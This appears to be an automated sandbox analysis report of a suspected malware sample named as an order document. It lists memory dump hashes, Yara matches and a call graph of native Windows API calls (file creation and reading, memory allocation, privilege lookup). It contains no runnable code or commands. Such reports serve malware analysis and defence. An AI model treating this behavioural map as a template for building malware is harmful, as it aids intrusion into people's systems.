                                Memory Dump Source
                                • Source File: 00000000.00000002.2120835000.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f9d000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: edf0d0de00c79d5007a35ecd406562a7093635ec5774fc5b782df1089430158c
                                • Instruction ID: 33eb19285ccaf826543122014ea3e9eeb0fc194944b5b19a3df3e8c5577411cf
                                • Opcode Fuzzy Hash: edf0d0de00c79d5007a35ecd406562a7093635ec5774fc5b782df1089430158c
                                • Instruction Fuzzy Hash: 6AF0F6714043449EFB208E16CC88B62FF98EF52334F28C45AED085B286C2799C40CBB1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c569d7d33131361f2af32aec42e64cc336839e05c376851205107660d138272c
                                • Instruction ID: 2ad6c2405de1a67f0b70ee07b38a8bef02f6f7dee3bfb0a27944c59fa0d06cf8
                                • Opcode Fuzzy Hash: c569d7d33131361f2af32aec42e64cc336839e05c376851205107660d138272c
                                • Instruction Fuzzy Hash: 2612C7B0C827458AD330CF25E96C9C93BB1BB45395FD44E09C2619B2E5EBB411AACF64
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d54ddf789f381a86e402ab17ffa3b56c2ce9129aab1ac1a877296633f0de1f22
                                • Instruction ID: 2c75170503bf2a25d27969f44e2c604c6f9d84bfa49bc620632cf76a910f2915
                                • Opcode Fuzzy Hash: d54ddf789f381a86e402ab17ffa3b56c2ce9129aab1ac1a877296633f0de1f22
                                • Instruction Fuzzy Hash: AFE1E8B4E001198FCB15DFA9C5849AEFBB2BF89305F248169E415AB356D730AD81CF61
                                Memory Dump Source
                                • Source File: 00000000.00000002.2121495236.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1070000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e28c03de11450213a3d81a73c327fc7def8dc56a343407032c6e1d4c67bc1a1
                                • Instruction ID: b21cc65cd15b66ab813823ca144e493e1b234ce87c26e7456a831c7bc8c3f169
                                • Opcode Fuzzy Hash: 9e28c03de11450213a3d81a73c327fc7def8dc56a343407032c6e1d4c67bc1a1
                                • Instruction Fuzzy Hash: DBA17F36E0021A8FCF05DFB4D8445DEBBF2FF89300B1585AAE915AB265DB31E915CB40
                                Memory Dump Source
                                • Source File: 00000000.00000002.2128896097.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5270000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e68c07ae153217b53eff87da4bcf215a9d9e6e54370583656d733514093ef97b
                                • Instruction ID: 3de77f6345c45fe44d4a8ece59d233c42130942ee692033d349848c1c6e209fa
                                • Opcode Fuzzy Hash: e68c07ae153217b53eff87da4bcf215a9d9e6e54370583656d733514093ef97b
                                • Instruction Fuzzy Hash: 06C15CB0C827468FD731CF24E8685C93BB1BB85394F944E09D161AF2E5EBB414AACF54
                                Memory Dump Source
                                • Source File: 00000000.00000002.2130568747.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7610000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e12ecc5b9faee3bbb414fe8e116641a8d86d56606a1a07b1dce8b47cdf16bd1
                                • Instruction ID: 5709e3f770b374f0e9a095041783d529cc058180fa0bf95513dc970c461b4247
                                • Opcode Fuzzy Hash: 4e12ecc5b9faee3bbb414fe8e116641a8d86d56606a1a07b1dce8b47cdf16bd1
                                • Instruction Fuzzy Hash: 36516EB0D052598FCB16CFA9C9405AEBBF2BF8A311F2481AAD405AB356D7349E45CF60

                                Execution Graph

                                Execution Coverage:1.4%
                                Dynamic/Decrypted Code Coverage:2.8%
                                Signature Coverage:5.9%
                                Total number of Nodes:564
                                Total number of Limit Nodes:67
                                execution_graph 96955 41f080 96956 41f08b 96955->96956 96958 41b960 96955->96958 96959 41b986 96958->96959 96966 409d30 96959->96966 96961 41b992 96962 41b9b3 96961->96962 96974 40c1b0 96961->96974 96962->96956 96964 41b9a5 97010 41a6a0 96964->97010 96967 409d3d 96966->96967 97013 409c80 96966->97013 96969 409d44 96967->96969 97025 409c20 96967->97025 96969->96961 96975 40c1d5 96974->96975 97445 40b1b0 96975->97445 96977 40c22c 97449 40ae30 96977->97449 96979 40c252 97009 40c4a3 96979->97009 97458 414390 96979->97458 96981 40c297 96981->97009 97461 408a60 96981->97461 96983 40c2db 96983->97009 97468 41a4f0 96983->97468 96987 40c331 96988 40c338 96987->96988 97480 41a000 96987->97480 96989 41bdb0 2 API calls 96988->96989 96991 40c345 96989->96991 96991->96964 96993 40c382 96994 41bdb0 2 API calls 96993->96994 96995 40c389 96994->96995 96995->96964 96996 40c392 96997 40f490 3 API calls 96996->96997 96998 40c406 96997->96998 96998->96988 96999 40c411 96998->96999 97000 41bdb0 2 API calls 96999->97000 97001 40c435 97000->97001 97485 41a050 97001->97485 97004 41a000 2 API calls 97005 40c470 97004->97005 97005->97009 97490 419e10 97005->97490 97008 41a6a0 2 API calls 97008->97009 97009->96964 97011 41a6bf ExitProcess 97010->97011 97012 41af50 LdrLoadDll 97010->97012 97012->97011 97044 418bb0 97013->97044 97017 409ca6 97017->96967 97018 409c9c 97018->97017 97051 41b2a0 97018->97051 97020 409ce3 97020->97017 97062 409aa0 97020->97062 97022 409d03 97068 409620 LdrLoadDll 97022->97068 97024 409d15 97024->96967 97419 41b590 97025->97419 97028 41b590 LdrLoadDll 97029 409c4b 97028->97029 97030 41b590 LdrLoadDll 97029->97030 97031 409c61 97030->97031 97032 40f170 97031->97032 97033 40f189 97032->97033 97427 40b030 97033->97427 97035 40f19c 97431 41a1d0 97035->97431 97038 409d55 97038->96961 97040 40f1c2 97041 40f1ed 97040->97041 97437 41a250 97040->97437 97043 41a480 2 API calls 97041->97043 97043->97038 97045 418bbf 97044->97045 97069 414e40 97045->97069 97047 409c93 97048 418a60 97047->97048 97075 41a5f0 97048->97075 97052 41b2b9 97051->97052 97082 414a40 97052->97082 97054 41b2d1 97055 41b2da 97054->97055 97121 41b0e0 97054->97121 97055->97020 97057 41b2ee 97057->97055 97139 419ef0 97057->97139 97397 407ea0 97062->97397 97064 409ac1 97064->97022 97065 409aba 97065->97064 97410 408160 97065->97410 97068->97024 97070 414e5a 97069->97070 97071 414e4e 97069->97071 97070->97047 97071->97070 97074 4152c0 LdrLoadDll 97071->97074 97073 414fac 97073->97047 97074->97073 97076 418a75 97075->97076 97078 41af50 97075->97078 97076->97018 97079 41af5a 97078->97079 97080 41af82 97079->97080 97081 414e40 LdrLoadDll 97079->97081 97080->97076 97081->97080 97083 414d75 97082->97083 97084 414a54 97082->97084 97083->97054 97084->97083 97147 419c40 97084->97147 97087 414b80 97150 41a350 97087->97150 97088 414b63 97207 41a450 LdrLoadDll 97088->97207 97091 414ba7 97093 41bdb0 2 API calls 97091->97093 97092 414b6d 97092->97054 97097 414bb3 97093->97097 97094 414d39 97096 41a480 2 API calls 97094->97096 97095 414d4f 97216 414780 LdrLoadDll NtReadFile NtClose 97095->97216 97098 414d40 97096->97098 97097->97092 97097->97094 97097->97095 97101 414c42 97097->97101 97098->97054 97100 414d62 97100->97054 97102 414ca9 97101->97102 97104 414c51 97101->97104 97102->97094 97103 414cbc 97102->97103 97209 41a2d0 97103->97209 97106 414c56 97104->97106 97107 414c6a 97104->97107 97208 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97106->97208 97110 414c87 97107->97110 97111 414c6f 97107->97111 97110->97098 97165 414400 97110->97165 97153 4146e0 97111->97153 97113 414c60 97113->97054 97115 414d1c 97213 41a480 97115->97213 97116 414c7d 97116->97054 97118 414c9f 97118->97054 97120 414d28 97120->97054 97123 41b0f1 97121->97123 97122 41b103 97122->97057 97123->97122 97234 41bd30 97123->97234 97125 41b124 97237 414060 97125->97237 97127 41b170 97127->97057 97128 41b147 97128->97127 97129 414060 3 API calls 97128->97129 97131 41b169 97129->97131 97131->97127 97269 415380 97131->97269 97132 41b1fa 97133 41b20a 97132->97133 97363 41aef0 LdrLoadDll 97132->97363 97279 41ad60 97133->97279 97136 41b238 97358 419eb0 97136->97358 97140 419f0c 97139->97140 97141 41af50 LdrLoadDll 97139->97141 97391 1182c0a 97140->97391 97141->97140 97142 419f27 97144 41bdb0 97142->97144 97145 41b349 97144->97145 97394 41a660 97144->97394 97145->97020 97148 41af50 LdrLoadDll 97147->97148 97149 414b34 97148->97149 97149->97087 97149->97088 97149->97092 97151 41af50 LdrLoadDll 97150->97151 97152 41a36c NtCreateFile 97151->97152 97152->97091 97154 4146fc 97153->97154 97155 41a2d0 LdrLoadDll 97154->97155 97156 41471d 97155->97156 97157 414724 97156->97157 97158 414738 97156->97158 97160 41a480 2 API calls 97157->97160 97159 41a480 2 API calls 97158->97159 97162 414741 97159->97162 97161 41472d 97160->97161 97161->97116 97217 41bfc0 LdrLoadDll RtlAllocateHeap 97162->97217 97164 41474c 97164->97116 97166 41444b 97165->97166 97167 41447e 97165->97167 97169 41a2d0 LdrLoadDll 97166->97169 97168 4145c9 97167->97168 97172 41449a 97167->97172 97171 41a2d0 LdrLoadDll 97168->97171 97170 414466 97169->97170 97173 41a480 2 API calls 97170->97173 97177 4145e4 97171->97177 97174 41a2d0 LdrLoadDll 97172->97174 97175 41446f 97173->97175 97176 4144b5 97174->97176 97175->97118 97179 4144d1 97176->97179 97180 4144bc 97176->97180 97230 41a310 LdrLoadDll 97177->97230 97183 4144d6 97179->97183 97184 4144ec 97179->97184 97182 41a480 2 API calls 97180->97182 97181 41461e 97185 41a480 2 API calls 97181->97185 97186 4144c5 97182->97186 97187 41a480 2 API calls 97183->97187 97193 4144f1 97184->97193 97218 41bf80 97184->97218 97189 414629 97185->97189 97186->97118 97190 4144df 97187->97190 97188 414503 97188->97118 97189->97118 97190->97118 97193->97188 97221 41a400 97193->97221 97194 414557 97200 41456e 97194->97200 97229 41a290 LdrLoadDll 97194->97229 97195 414575 97198 41a480 2 API calls 97195->97198 97196 41458a 97199 41a480 2 API calls 97196->97199 97198->97188 97201 414593 97199->97201 97200->97195 97200->97196 97202 4145bf 97201->97202 97224 41bb80 97201->97224 97202->97118 97204 4145aa 97205 41bdb0 2 API calls 97204->97205 97206 4145b3 97205->97206 97206->97118 97207->97092 97208->97113 97210 41af50 LdrLoadDll 97209->97210 97211 414d04 97210->97211 97212 41a310 LdrLoadDll 97211->97212 97212->97115 97214 41af50 LdrLoadDll 97213->97214 97215 41a49c NtClose 97214->97215 97215->97120 97216->97100 97217->97164 97231 41a620 97218->97231 97220 41bf98 97220->97193 97222 41af50 LdrLoadDll 97221->97222 97223 41a41c NtReadFile 97222->97223 97223->97194 97225 41bba4 97224->97225 97226 41bb8d 97224->97226 97225->97204 97226->97225 97227 41bf80 2 API calls 97226->97227 97228 41bbbb 97227->97228 97228->97204 97229->97200 97230->97181 97232 41af50 LdrLoadDll 97231->97232 97233 41a63c RtlAllocateHeap 97232->97233 97233->97220 97235 41bd5d 97234->97235 97364 41a530 97234->97364 97235->97125 97238 414071 97237->97238 97239 414079 97237->97239 97238->97128 97268 41434c 97239->97268 97367 41cf20 97239->97367 97241 4140cd 97242 41cf20 2 API calls 97241->97242 97245 4140d8 97242->97245 97243 414126 97246 41cf20 2 API calls 97243->97246 97245->97243 97247 41d050 3 API calls 97245->97247 97378 41cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 97245->97378 97249 41413a 97246->97249 97247->97245 97248 414197 97250 41cf20 2 API calls 97248->97250 97249->97248 97372 41d050 97249->97372 97251 4141ad 97250->97251 97253 4141ea 97251->97253 97255 41d050 3 API calls 97251->97255 97254 41cf20 2 API calls 97253->97254 97256 4141f5 97254->97256 97255->97251 97257 41422f 97256->97257 97258 41d050 3 API calls 97256->97258 97379 41cf80 LdrLoadDll RtlFreeHeap 97257->97379 97258->97256 97260 414324 97380 41cf80 LdrLoadDll RtlFreeHeap 97260->97380 97262 41432e 97381 41cf80 LdrLoadDll RtlFreeHeap 97262->97381 97264 414338 97382 41cf80 LdrLoadDll RtlFreeHeap 97264->97382 97266 414342 97383 41cf80 LdrLoadDll RtlFreeHeap 97266->97383 97268->97128 97270 415391 97269->97270 97271 414a40 8 API calls 97270->97271 97273 4153a7 97271->97273 97272 4153fa 97272->97132 97273->97272 97274 4153e2 97273->97274 97275 4153f5 97273->97275 97276 41bdb0 2 API calls 97274->97276 97277 41bdb0 2 API calls 97275->97277 97278 4153e7 97276->97278 97277->97272 97278->97132 97384 41ac20 97279->97384 97281 41ad74 97282 41ac20 LdrLoadDll 97281->97282 97283 41ad7d 97282->97283 97284 41ac20 LdrLoadDll 97283->97284 97285 41ad86 97284->97285 97286 41ac20 LdrLoadDll 97285->97286 97287 41ad8f 97286->97287 97288 41ac20 LdrLoadDll 97287->97288 97289 41ad98 97288->97289 97290 41ac20 LdrLoadDll 97289->97290 97291 41ada1 97290->97291 97292 41ac20 LdrLoadDll 97291->97292 97293 41adad 97292->97293 97294 41ac20 LdrLoadDll 97293->97294 97295 41adb6 97294->97295 97296 41ac20 LdrLoadDll 97295->97296 97297 41adbf 97296->97297 97298 41ac20 LdrLoadDll 97297->97298 97299 41adc8 97298->97299 97300 41ac20 LdrLoadDll 97299->97300 97301 41add1 97300->97301 97302 41ac20 LdrLoadDll 97301->97302 97303 41adda 97302->97303 97304 41ac20 LdrLoadDll 97303->97304 97305 41ade6 97304->97305 97306 41ac20 LdrLoadDll 97305->97306 97307 41adef 97306->97307 97308 41ac20 LdrLoadDll 97307->97308 97309 41adf8 97308->97309 97310 41ac20 LdrLoadDll 97309->97310 97311 41ae01 97310->97311 97312 41ac20 LdrLoadDll 97311->97312 97313 41ae0a 97312->97313 97314 41ac20 LdrLoadDll 97313->97314 97315 41ae13 97314->97315 97316 41ac20 LdrLoadDll 97315->97316 97317 41ae1f 97316->97317 97318 41ac20 LdrLoadDll 97317->97318 97319 41ae28 97318->97319 97320 41ac20 LdrLoadDll 97319->97320 97321 41ae31 97320->97321 97322 41ac20 LdrLoadDll 97321->97322 97323 41ae3a 97322->97323 97324 41ac20 LdrLoadDll 97323->97324 97325 41ae43 97324->97325 97326 41ac20 LdrLoadDll 97325->97326 97327 41ae4c 97326->97327 97328 41ac20 LdrLoadDll 97327->97328 97329 41ae58 97328->97329 97330 41ac20 LdrLoadDll 97329->97330 97331 41ae61 97330->97331 97332 41ac20 LdrLoadDll 97331->97332 97333 41ae6a 97332->97333 97334 41ac20 LdrLoadDll 97333->97334 97335 41ae73 97334->97335 97336 41ac20 LdrLoadDll 97335->97336 97337 41ae7c 97336->97337 97338 41ac20 LdrLoadDll 97337->97338 97339 41ae85 97338->97339 97340 41ac20 LdrLoadDll 97339->97340 97341 41ae91 97340->97341 97342 41ac20 LdrLoadDll 97341->97342 97343 41ae9a 97342->97343 97344 41ac20 LdrLoadDll 97343->97344 97345 41aea3 97344->97345 97346 41ac20 LdrLoadDll 97345->97346 97347 41aeac 97346->97347 97348 41ac20 LdrLoadDll 97347->97348 97349 41aeb5 97348->97349 97350 41ac20 LdrLoadDll 97349->97350 97351 41aebe 97350->97351 97352 41ac20 LdrLoadDll 97351->97352 97353 41aeca 97352->97353 97354 41ac20 LdrLoadDll 97353->97354 97355 41aed3 97354->97355 97356 41ac20 LdrLoadDll 97355->97356 97357 41aedc 97356->97357 97357->97136 97359 41af50 LdrLoadDll 97358->97359 97360 419ecc 97359->97360 97390 1182df0 LdrInitializeThunk 97360->97390 97361 419ee3 97361->97057 97363->97133 97365 41a54c NtAllocateVirtualMemory 97364->97365 97366 41af50 LdrLoadDll 97364->97366 97365->97235 97366->97365 97368 41cf30 97367->97368 97369 41cf36 97367->97369 97368->97241 97370 41bf80 2 API calls 97369->97370 97371 41cf5c 97370->97371 97371->97241 97373 41cfc0 97372->97373 97374 41d01d 97373->97374 97375 41bf80 2 API calls 97373->97375 97374->97249 97376 41cffa 97375->97376 97377 41bdb0 2 API calls 97376->97377 97377->97374 97378->97245 97379->97260 97380->97262 97381->97264 97382->97266 97383->97268 97385 41ac3b 97384->97385 97386 414e40 LdrLoadDll 97385->97386 97387 41ac5b 97386->97387 97388 414e40 LdrLoadDll 97387->97388 97389 41ad07 97387->97389 97388->97389 97389->97281 97389->97389 97390->97361 97392 1182c1f LdrInitializeThunk 97391->97392 97393 1182c11 97391->97393 97392->97142 97393->97142 97395 41af50 LdrLoadDll 97394->97395 97396 41a67c RtlFreeHeap 97395->97396 97396->97145 97398 407eb0 97397->97398 97399 407eab 97397->97399 97400 41bd30 2 API calls 97398->97400 97399->97065 97407 407ed5 97400->97407 97401 407f38 97401->97065 97402 419eb0 2 API calls 97402->97407 97403 407f3e 97404 407f64 97403->97404 97406 41a5b0 2 API calls 97403->97406 97404->97065 97408 407f55 97406->97408 97407->97401 97407->97402 97407->97403 97409 41bd30 2 API calls 97407->97409 97413 41a5b0 97407->97413 97408->97065 97409->97407 97411 41a5b0 2 API calls 97410->97411 97412 40817e 97411->97412 97412->97022 97414 41a5cc 97413->97414 97415 41af50 LdrLoadDll 97413->97415 97418 1182c70 LdrInitializeThunk 97414->97418 97415->97414 97416 41a5e3 97416->97407 97418->97416 97420 41b5b3 97419->97420 97423 40ace0 97420->97423 97424 40ad04 97423->97424 97425 40ad40 LdrLoadDll 97424->97425 97426 409c3a 97424->97426 97425->97426 97426->97028 97428 40b053 97427->97428 97429 40b0d0 97428->97429 97443 419c80 LdrLoadDll 97428->97443 97429->97035 97432 41af50 LdrLoadDll 97431->97432 97433 40f1ab 97432->97433 97433->97038 97434 41a7c0 97433->97434 97435 41af50 LdrLoadDll 97434->97435 97436 41a7df LookupPrivilegeValueW 97435->97436 97436->97040 97438 41a266 97437->97438 97439 41af50 LdrLoadDll 97438->97439 97440 41a26c 97439->97440 97444 1182ea0 LdrInitializeThunk 97440->97444 97441 41a28b 97441->97041 97443->97429 97444->97441 97446 40b1b9 97445->97446 97447 40b030 LdrLoadDll 97446->97447 97448 40b1f4 97447->97448 97448->96977 97450 40ae41 97449->97450 97451 40ae3d 97449->97451 97452 40ae5a 97450->97452 97453 40ae8c 97450->97453 97451->96979 97495 419cc0 LdrLoadDll 97452->97495 97496 419cc0 LdrLoadDll 97453->97496 97455 40ae9d 97455->96979 97457 40ae7c 97457->96979 97459 40f490 3 API calls 97458->97459 97460 4143b6 97459->97460 97460->96981 97462 408a79 97461->97462 97497 4087a0 97461->97497 97464 408a9d 97462->97464 97465 4087a0 20 API calls 97462->97465 97464->96983 97466 408a8a 97465->97466 97466->97464 97515 40f700 10 API calls 97466->97515 97469 41af50 LdrLoadDll 97468->97469 97470 41a50c 97469->97470 97639 1182e80 LdrInitializeThunk 97470->97639 97471 40c312 97473 40f490 97471->97473 97474 40f4ad 97473->97474 97640 419fb0 97474->97640 97477 40f4f5 97477->96987 97478 41a000 2 API calls 97479 40f51e 97478->97479 97479->96987 97481 41af50 LdrLoadDll 97480->97481 97482 41a01c 97481->97482 97647 1182d10 LdrInitializeThunk 97482->97647 97483 40c375 97483->96993 97483->96996 97486 41af50 LdrLoadDll 97485->97486 97487 41a06c 97486->97487 97648 1182d30 LdrInitializeThunk 97487->97648 97488 40c449 97488->97004 97491 41af50 LdrLoadDll 97490->97491 97492 419e2c 97491->97492 97649 1182fb0 LdrInitializeThunk 97492->97649 97493 40c49c 97493->97008 97495->97457 97496->97455 97498 407ea0 4 API calls 97497->97498 97513 4087ba 97497->97513 97498->97513 97499 408a3f 97500 408160 2 API calls 97499->97500 97502 408a49 97500->97502 97502->97462 97504 419ef0 2 API calls 97504->97513 97506 41a480 LdrLoadDll NtClose 97506->97513 97509 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97509->97513 97512 419e10 2 API calls 97512->97513 97513->97499 97513->97502 97513->97504 97513->97506 97513->97509 97513->97512 97516 419d00 97513->97516 97519 4085d0 97513->97519 97531 40f5e0 LdrLoadDll NtClose 97513->97531 97532 419d80 LdrLoadDll 97513->97532 97533 419db0 LdrLoadDll 97513->97533 97534 419e40 LdrLoadDll 97513->97534 97535 4083a0 97513->97535 97551 405f60 LdrLoadDll 97513->97551 97515->97464 97517 41af50 LdrLoadDll 97516->97517 97518 419d1c 97517->97518 97518->97513 97520 4085e6 97519->97520 97552 419870 97520->97552 97522 408771 97522->97513 97523 4085ff 97523->97522 97573 4081a0 97523->97573 97525 4086e5 97525->97522 97526 4083a0 11 API calls 97525->97526 97527 408713 97526->97527 97527->97522 97528 419ef0 2 API calls 97527->97528 97529 408748 97528->97529 97529->97522 97530 41a4f0 2 API calls 97529->97530 97530->97522 97531->97513 97532->97513 97533->97513 97534->97513 97536 4083c9 97535->97536 97618 408310 97536->97618 97539 41a4f0 2 API calls 97540 4083dc 97539->97540 97540->97539 97541 408467 97540->97541 97544 408462 97540->97544 97626 40f660 97540->97626 97541->97513 97542 41a480 2 API calls 97543 40849a 97542->97543 97543->97541 97545 419d00 LdrLoadDll 97543->97545 97544->97542 97546 4084ff 97545->97546 97546->97541 97630 419d40 97546->97630 97548 408563 97548->97541 97549 414a40 8 API calls 97548->97549 97550 4085b8 97549->97550 97550->97513 97551->97513 97553 41bf80 2 API calls 97552->97553 97554 419887 97553->97554 97580 409310 97554->97580 97556 4198a2 97557 4198e0 97556->97557 97558 4198c9 97556->97558 97561 41bd30 2 API calls 97557->97561 97559 41bdb0 2 API calls 97558->97559 97560 4198d6 97559->97560 97560->97523 97562 41991a 97561->97562 97563 41bd30 2 API calls 97562->97563 97565 419933 97563->97565 97570 419bd4 97565->97570 97586 41bd70 97565->97586 97567 419bc0 97568 41bdb0 2 API calls 97567->97568 97569 419bca 97568->97569 97569->97523 97571 41bdb0 2 API calls 97570->97571 97572 419c29 97571->97572 97572->97523 97574 40829f 97573->97574 97575 4081b5 97573->97575 97574->97525 97575->97574 97576 414a40 8 API calls 97575->97576 97577 408222 97576->97577 97578 41bdb0 2 API calls 97577->97578 97579 408249 97577->97579 97578->97579 97579->97525 97581 409335 97580->97581 97582 40ace0 LdrLoadDll 97581->97582 97583 409368 97582->97583 97585 40938d 97583->97585 97589 40cf10 97583->97589 97585->97556 97612 41a570 97586->97612 97590 40cf3c 97589->97590 97591 41a1d0 LdrLoadDll 97590->97591 97592 40cf55 97591->97592 97593 40cf5c 97592->97593 97600 41a210 97592->97600 97593->97585 97595 40cf7f 97595->97593 97609 41a800 LdrLoadDll 97595->97609 97597 40cf97 97598 41a480 2 API calls 97597->97598 97599 40cfba 97598->97599 97599->97585 97601 41a22c 97600->97601 97602 41af50 LdrLoadDll 97600->97602 97610 1182ca0 LdrInitializeThunk 97601->97610 97602->97601 97603 41a247 97603->97595 97604 41af50 LdrLoadDll 97603->97604 97605 41a26c 97604->97605 97611 1182ea0 LdrInitializeThunk 97605->97611 97606 41a28b 97606->97595 97609->97597 97610->97603 97611->97606 97613 41af50 LdrLoadDll 97612->97613 97614 41a58c 97613->97614 97617 1182f90 LdrInitializeThunk 97614->97617 97615 419bb9 97615->97567 97615->97570 97617->97615 97619 408328 97618->97619 97620 40ace0 LdrLoadDll 97619->97620 97621 408343 97620->97621 97622 414e40 LdrLoadDll 97621->97622 97623 408353 97622->97623 97624 40835c PostThreadMessageW 97623->97624 97625 408370 97623->97625 97624->97625 97625->97540 97627 40f673 97626->97627 97633 419e80 97627->97633 97631 41af50 LdrLoadDll 97630->97631 97632 419d5c 97631->97632 97632->97548 97634 41af50 LdrLoadDll 97633->97634 97635 419e9c 97634->97635 97638 1182dd0 LdrInitializeThunk 97635->97638 97636 40f69e 97636->97540 97638->97636 97639->97471 97641 419fc6 97640->97641 97642 41af50 LdrLoadDll 97641->97642 97643 419fcc 97642->97643 97646 1182f30 LdrInitializeThunk 97643->97646 97644 40f4ee 97644->97477 97644->97478 97646->97644 97647->97483 97648->97488 97649->97493 97651 1182ad0 LdrInitializeThunk

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
                                APIs
                                • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID: !JA$bMA$bMA
                                • API String ID: 2738559852-4222312340
                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 216 40ace0-40ad09 call 41cc40 219 40ad0b-40ad0e 216->219 220 40ad0f-40ad1d call 41d060 216->220 223 40ad2d-40ad3e call 41b490 220->223 224 40ad1f-40ad2a call 41d2e0 220->224 229 40ad40-40ad54 LdrLoadDll 223->229 230 40ad57-40ad5a 223->230 224->223 229->230
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 231 41a350-41a3a1 call 41af50 NtCreateFile
                                APIs
                                • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 234 41a52a-41a56d call 41af50 NtAllocateVirtualMemory
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                Memory Dump Source
                                • Source File: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_ORDER_1105-19-24-3537.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: 2da354779f8dce5e8e82fb92bfc5a15275b0f95102713571776ea2e2e7d656d2
                                • Instruction ID: 386e01b7f5ba63d5dd7728c8051adcf0be814dbd17661781ccd1b2e729f4b12f
                                • Opcode Fuzzy Hash: 2da354779f8dce5e8e82fb92bfc5a15275b0f95102713571776ea2e2e7d656d2
